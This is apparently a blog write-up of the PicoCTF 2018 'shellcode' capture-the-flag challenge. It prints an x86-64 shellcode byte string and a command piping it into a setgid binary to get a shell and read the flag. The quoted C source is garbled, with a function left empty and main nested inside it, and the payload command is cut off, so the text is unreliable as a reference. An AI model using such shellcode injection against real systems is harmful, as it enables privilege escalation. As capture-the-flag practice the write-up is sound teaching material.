PicoCTF 2018 Challenge [Binary Exploitation 200pts] | October 14, 2018

PicoCTF 2018 - Binary Exploitation 200: shellcode


This program executes any input you give it. Can you get a shell? You can find the program in ` /problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed ` on the shell server. Source

The challenges were very easy i have solved several of challenges but I just wrote some useful solutions


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter a string!");

  puts("Thanks! Executing now...");

  ((void (*)())buf)();

  return 0;

by executing we connected remotly shell and show as :

drwxr-xr-x   2 root       root          4096 Sep 28 08:11 ./
drwxr-x--x 576 root       root         53248 Sep 30 03:45 ../
-r--r-----   1 hacksports shellcode_0     34 Sep 28 08:11 flag.txt
-rwxr-sr-x   1 hacksports shellcode_0 725408 Sep 28 08:11 vuln*
-rw-rw-r--   1 hacksports hacksports     562 Sep 28 08:11 vuln.c

the terminal shown a list of files contain Flag.txt , but we don"t have the right permision , so we need to get read the content of flag.txt by vuln . we have already know "shellcode" i adopted Shellstorm collections

$ uname -a
Linux pico-2018-shell-1 4.4.0-1067-aws #77-Ubuntu SMP Mon Aug 27 13:22:03 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Linux x86_64 i wrote a shellcode :

$ python -c "print('\xeb\x12\x31\xc9\x5e\x56\x5f\xb1\x15\x8a\x06\xf
e\xc8\x88\x06\x46\xe2\xf7\xff\xe7\xe8\xe9\xff\xff\xff\x32\xc1\x32\xca\x52\x69\x30\x74\x69\x01\x69\x30\x63\x6a\x6f\x8a\xe4\xb1\x0c\xce\x81')" > ~

$ cat ~/shellcode.txt - | ./vuln
Enter a string!
Thanks! Executing now...

flag.txt  vuln  vuln.c
cat flag.txt

Bingo, we Got the Flag


#0v3n_Sh3ll ❤

Written on October 14, 2018